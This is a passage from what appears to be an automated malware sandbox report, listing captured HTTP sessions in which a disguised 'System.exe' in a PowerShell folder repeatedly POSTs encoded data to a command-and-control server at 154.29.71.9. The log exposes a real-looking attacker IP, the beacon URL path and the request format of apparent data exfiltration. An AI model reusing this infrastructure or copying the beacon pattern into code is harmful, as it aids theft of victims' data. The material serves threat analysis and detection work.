                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.449740154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:23.640535116 CET441OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----8sMojQO808Z6RTnGrLBFDy69zHfnum3F37
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 139206
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:23.990158081 CET12360OUTData Raw: 2d 2d 2d 2d 2d 2d 38 73 4d 6f 6a 51 4f 38 30 38 5a 36 52 54 6e 47 72 4c 42 46 44 79 36 39 7a 48 66 6e 75 6d 33 46 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                    Data Ascii: ------8sMojQO808Z6RTnGrLBFDy69zHfnum3F37Content-Disposition: form-data; name="0"Content-Type: text/plain\[X_[U]S[YZUPP[TVWTIRXR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[
                                                                                                    Jan 4, 2025 14:52:23.995120049 CET9888OUTData Raw: 39 49 54 77 35 54 4e 6a 78 67 6c 72 49 46 36 51 2f 33 34 6e 7a 53 4c 41 6c 41 64 39 5a 35 39 72 6a 42 79 4e 36 78 46 39 64 45 43 61 39 61 33 47 7a 58 47 47 38 6c 66 65 5a 6c 42 4e 77 39 67 57 2b 77 39 34 48 39 6f 37 66 57 76 32 74 6d 53 69 77 78
                                                                                                    Data Ascii: 9ITw5TNjxglrIF6Q/34nzSLAlAd9Z59rjByN6xF9dECa9a3GzXGG8lfeZlBNw9gW+w94H9o7fWv2tmSiwxRRZ03iOWJlym9x2ewuI+EPl+FWuoC372dn3tapR1OnqnVCc6c6nfXbtOKRf5RPrXApYxlsVjIoNMMXaK3ixZbD5u5MPyjA1f7DQDnxJ7Dfgkv1ML3S7lFSdnm+8e9uEHeBkeJJCYnvmQoD0XQnLSFZ22zNvVVpQoQ
                                                                                                    Jan 4, 2025 14:52:23.995176077 CET2472OUTData Raw: 47 33 50 76 52 72 53 32 5a 4d 4c 42 65 46 4d 71 68 51 6d 79 36 34 4a 59 47 34 65 6c 32 6c 48 31 57 68 62 73 52 71 56 66 74 6f 75 63 4e 52 6a 34 74 75 4f 62 68 4e 65 66 74 70 77 38 61 44 65 4a 6f 61 6a 52 75 74 78 76 31 32 68 5a 38 6e 30 78 6e 74
                                                                                                    Data Ascii: G3PvRrS2ZMLBeFMqhQmy64JYG4el2lH1WhbsRqVftoucNRj4tuObhNeftpw8aDeJoajRutxv12hZ8n0xntFuahgWjJ76ABsuwwBrGubyTXFsDJ4PvIR33p9SDYd+M+13G+zVgVBfyJ/vXYsQQ+ify3e8KKEFbtuPVkl4dBS6Oj+LeRsI56tR3hvmu0qopPqZwZr5nTrEeOfdR1z95Txr+xG3UEJq3FBcVYew2s7L4voXV29RZK5
                                                                                                    Jan 4, 2025 14:52:23.995275974 CET4944OUTData Raw: 39 4b 52 58 38 59 42 4c 61 59 58 66 4f 5a 6b 30 75 59 72 42 67 61 7a 61 77 32 58 59 6b 2f 5a 34 49 53 61 50 75 6b 35 59 66 2b 56 45 66 55 75 59 37 30 34 46 6a 6b 4d 6c 4f 78 2f 4e 2f 4b 73 4e 77 38 30 4e 36 63 33 6f 70 57 4d 61 35 45 30 57 46 56
                                                                                                    Data Ascii: 9KRX8YBLaYXfOZk0uYrBgazaw2XYk/Z4ISaPuk5Yf+VEfUuY704FjkMlOx/N/KsNw80N6c3opWMa5E0WFVZ7/BXlVF0I5SOdxHl5mj8xP0EDG13LCrcCXee1uoRC0+WjCWUq2z81zX875tANSxApmVbDAF/Gg/8f5t47qqmuexcNgoBIUQkaukjvROlFmvQepAhSpCihShcQQhGUSO8gTUhAuvTeq9KL9CK9996Sk+j7fuf7jXP
                                                                                                    Jan 4, 2025 14:52:23.995341063 CET4944OUTData Raw: 53 75 33 70 4f 62 37 39 59 42 30 67 79 75 44 6e 66 44 68 56 30 65 43 63 56 71 39 58 46 33 50 77 50 70 38 32 6f 64 31 7a 35 4a 65 64 4e 37 4a 42 34 61 50 4f 77 50 43 45 53 64 2f 69 38 70 43 72 74 32 53 62 41 53 31 38 33 4a 70 50 66 38 6f 36 62 74
                                                                                                    Data Ascii: Su3pOb79YB0gyuDnfDhV0eCcVq9XF3PwPp82od1z5JedN7JB4aPOwPCESd/i8pCrt2SbAS183JpPf8o6btj4ZX1pvnNfXzpg+a0OziTpWyUz0ZH7gsPN+VDBguwNt1crvwiHeRKocyoN6WcZbV9ymnKEpkiL2P9CA4ptTx7jMegvhXFInikcXZm2Jh1wWApk58UVnp6nHtPsBApYEthxn2G4NOVguVKdZMGLF1aT05DzUXVulkB
                                                                                                    Jan 4, 2025 14:52:23.998620033 CET2472OUTData Raw: 31 37 6c 6a 4a 4d 77 72 52 66 7a 49 37 78 71 54 33 4a 6d 63 45 55 33 48 43 67 51 52 68 45 2f 62 46 67 6e 77 33 47 71 38 69 38 5a 64 70 67 7a 56 4c 71 38 2b 51 62 6a 50 4f 72 62 54 69 52 63 72 6c 54 73 78 4e 47 79 78 6c 66 36 49 75 67 77 4e 61 46
                                                                                                    Data Ascii: 17ljJMwrRfzI7xqT3JmcEU3HCgQRhE/bFgnw3Gq8i8ZdpgzVLq8+QbjPOrbTiRcrlTsxNGyxlf6IugwNaFj778K6Tp5BQcyFB2UL0HQqNPo1MvULSezydY8dg9fEhyF8RsCH54thCVpj4islhi18Ca63n/0SAB1dzvNF/VCVF3i86gHRrFqK69iyOOoE7p6pvwejAdK1Gpc74f91XLwUb2787pS1dm9JaDIldKZ9prXTwl3WFsL
                                                                                                    Jan 4, 2025 14:52:24.000008106 CET4944OUTData Raw: 66 32 72 74 58 4e 5a 6c 79 2f 35 42 31 37 6f 61 37 39 51 34 6a 75 45 47 71 57 62 52 57 35 71 77 66 76 43 35 54 72 51 63 54 65 51 57 7a 63 47 4f 37 70 2b 6e 51 4c 7a 68 6d 47 6f 34 66 67 6b 42 71 78 6e 48 4a 52 43 31 73 61 68 32 67 71 74 44 34 44
                                                                                                    Data Ascii: f2rtXNZly/5B17oa79Q4juEGqWbRW5qwfvC5TrQcTeQWzcGO7p+nQLzhmGo4fgkBqxnHJRC1sah2gqtD4D+VFytpREl87OdZhv1TqcLfuvIhWn/rJvvnc6V/GtsO9BI+oRfHVPMDUw19LOt/Xd/cz7NEb45pI1yjuPm6WZetHdOQpx7unNdh9DtEDhMMf65cgIswjr8/2JGP5DInBCtDR4JyOG/VBit6IDOBTbKKUEdFOdw/2h9
                                                                                                    Jan 4, 2025 14:52:24.000025034 CET2472OUTData Raw: 56 34 72 72 56 55 2f 4f 65 48 72 76 4f 6f 5a 2f 6d 35 6b 4b 2f 32 35 6f 4f 41 6b 61 62 61 46 63 69 6c 74 67 64 6b 39 45 68 49 67 77 66 47 4b 57 6d 69 6d 7a 59 39 79 35 47 4a 6d 62 4c 43 6d 2f 45 6c 57 4e 47 7a 55 62 4c 48 75 57 2f 50 50 37 6f 78
                                                                                                    Data Ascii: V4rrVU/OeHrvOoZ/m5kK/25oOAkabaFciltgdk9EhIgwfGKWmimzY9y5GJmbLCm/ElWNGzUbLHuW/PP7ox80/iMqKw6aoKvW5ChCFuRdk1Zru4fVH5pwCa82XSLnSUYYS+KkU98inPsNCrjDvjpnXwd5VYlH35gqVbCjcRJXBjyHUsg+9iXAi2w6QmoTBFsPzhk5bDpU1YgEkQgul8fFHTXOGoVddXvPTzk/jRhUr7FRs+IGizz
                                                                                                    Jan 4, 2025 14:52:24.000066996 CET4944OUTData Raw: 69 56 51 36 2f 6b 71 73 30 51 63 33 41 4c 65 44 70 2b 33 5a 32 6e 6d 77 53 33 79 5a 57 44 78 50 72 51 67 64 52 36 53 62 33 56 57 43 75 77 6b 6a 4f 71 33 78 68 5a 42 34 62 32 5a 6a 42 75 53 74 76 6e 63 73 52 4d 2b 6d 68 58 76 61 34 56 4b 50 51 4d
                                                                                                    Data Ascii: iVQ6/kqs0Qc3ALeDp+3Z2nmwS3yZWDxPrQgdR6Sb3VWCuwkjOq3xhZB4b2ZjBuStvncsRM+mhXva4VKPQMySfRIRkhj43XneThsoBkzJ0TcnGw1Yn0yWhyI0NRMQHeydfopQfXNHBZohVFD02DmG/4eEaHuvLzmBleSChJB0R1sQKnwG/DB2xzRUvVA534iGp0ivsJ/iu3S8Djbc2WQ+75ybuHfCV9WuoW1LEPpu2m+gGB8Xr5N
                                                                                                    Jan 4, 2025 14:52:24.000108957 CET2472OUTData Raw: 63 69 58 56 4d 70 77 45 75 6b 58 42 52 79 69 42 36 4d 69 42 45 53 6f 67 4e 72 68 5a 61 52 75 70 39 36 48 5a 78 38 6a 6d 61 66 5a 30 30 69 50 35 34 6a 6e 2f 2b 72 53 2b 61 68 67 6c 72 4c 50 74 34 68 67 42 73 2b 7a 61 52 31 76 4c 48 77 78 61 6f 35
                                                                                                    Data Ascii: ciXVMpwEukXBRyiB6MiBESogNrhZaRup96HZx8jmafZ00iP54jn/+rS+ahglrLPt4hgBs+zaR1vLHwxao5/ujPXfDDrXssmWXsOD+iPf0ZAkh1AXk+qffjhAccewzbil+HS3J8z1rEpQOMXBeEhSOd/YaHUbGgUdSNBzJYoL7MdblnM9T42yyu2q4GdD+14/N2bhhnrxoRBYY1U2rD+bb9ouFbhtE5b70Sq+kwgV7IhuIKa0KBE
                                                                                                    Jan 4, 2025 14:52:24.167165041 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:24.462846994 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:24 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.449744154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:24.882196903 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1856
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.449745154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:25.006479979 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:25.364029884 CET2600OUTData Raw: 59 5a 5d 5c 5b 5a 58 52 5b 59 5a 55 50 5a 5b 57 56 53 54 46 52 58 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YZ]\[ZXR[YZUPZ[WVSTFRXR\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9.>)^%)0_?=3V'(0Z85>;Q6=.+&U?-/"Y ']/,
                                                                                                    Jan 4, 2025 14:52:25.548212051 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:25.681894064 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.449746154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:25.816062927 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:26.162619114 CET2600OUTData Raw: 5c 5a 58 5a 5b 5d 58 50 5b 59 5a 55 50 5e 5b 51 56 53 54 46 52 59 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \ZXZ[]XP[YZUP^[QVSTFRYRPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;>>&8%) Z(43;/8U"P!.,58%).(E&3;9"Y ']/<
                                                                                                    Jan 4, 2025 14:52:26.390369892 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:26.526015997 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:26 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.449748154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:26.805159092 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:27.165388107 CET2600OUTData Raw: 59 59 58 5a 5b 54 5d 57 5b 59 5a 55 50 5a 5b 51 56 52 54 48 52 5d 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YYXZ[T]W[YZUPZ[QVRTHR]RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9;>$(*P=4Y+,';+8U9!.;#86(-;&8Z9"Y ']/,
                                                                                                    Jan 4, 2025 14:52:27.350290060 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:27.483858109 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.449749154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:27.665738106 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:28.020119905 CET2600OUTData Raw: 5c 5d 58 5b 5b 5c 5d 56 5b 59 5a 55 50 50 5b 5b 56 51 54 46 52 5e 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \]X[[\]V[YZUPP[[VQTFR^RYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:/>9X%^:P*-$+=3T$3;#)!-/U"-V)=$A%# Z9"Y ']/
                                                                                                    Jan 4, 2025 14:52:28.190926075 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:28.320087910 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:28 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.449751154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:28.448302031 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:28.801211119 CET2600OUTData Raw: 59 5e 5d 58 5b 5e 5d 54 5b 59 5a 55 50 5d 5b 5a 56 56 54 46 52 5a 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y^]X[^]T[YZUP][ZVVTFRZRQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,X9289=-?+$8Y,3*T!+V"+=P>>72$Z:/"Y ']/0
                                                                                                    Jan 4, 2025 14:52:28.972592115 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:29.102885962 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:28 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.449752154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:29.234065056 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:29.582921982 CET2600OUTData Raw: 5c 5b 58 51 5b 5d 5d 50 5b 59 5a 55 50 5f 5b 5a 56 5d 54 43 52 5f 52 5c 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \[XQ[]]P[YZUP_[ZV]TCR_R\U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\98_%*.<[(>(08,_,02P5=58)4E1# X-"Y ']/
                                                                                                    Jan 4, 2025 14:52:29.766499043 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:29.913481951 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.449754154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:30.077143908 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.449755154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:30.444156885 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:30.801223993 CET2600OUTData Raw: 59 50 58 50 5b 5e 5d 57 5b 59 5a 55 50 5c 5b 53 56 5c 54 40 52 5c 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YPXP[^]W[YZUP\[SV\T@R\R^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9[.>Z%;9*>;(3],X8.!=V"))7&##./"Y ']/4
                                                                                                    Jan 4, 2025 14:52:30.980217934 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:31.114032030 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.449756154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
